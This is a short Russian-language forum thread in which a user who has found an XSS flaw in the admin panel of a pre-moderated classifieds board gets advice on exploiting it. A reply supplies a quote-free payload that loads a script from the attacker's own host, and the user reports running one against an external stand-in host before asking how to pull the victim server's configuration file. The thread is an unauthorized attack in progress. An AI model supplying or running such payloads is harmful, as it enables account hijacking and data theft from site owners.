Нашел Xss в админке(доска объявлений с премодерированием).

Не проходят только символы " ' \

Авторизация через сессии. Что можно сделать с помощью яваскрипта?

Спс.

Да. <script src=абсолютный_адрес_без_кав� �чек></script>
Скрипт должен находиться где-то на твоем хосте

Спасибо, будем пробовать


<script src=http://xxx.com/rrr.php></script> - вот так нет реакции, там можно PHP подключать или только яваскрипт?

---------------
упс, код выполняется, идем дальше.

Такой вопрос:

Как заставить код выполняться на их сервере а не на моем?

Нужно выкачать конфигурационный файл, но скрипт выполняется у меня и ищет файл у меня на хосте.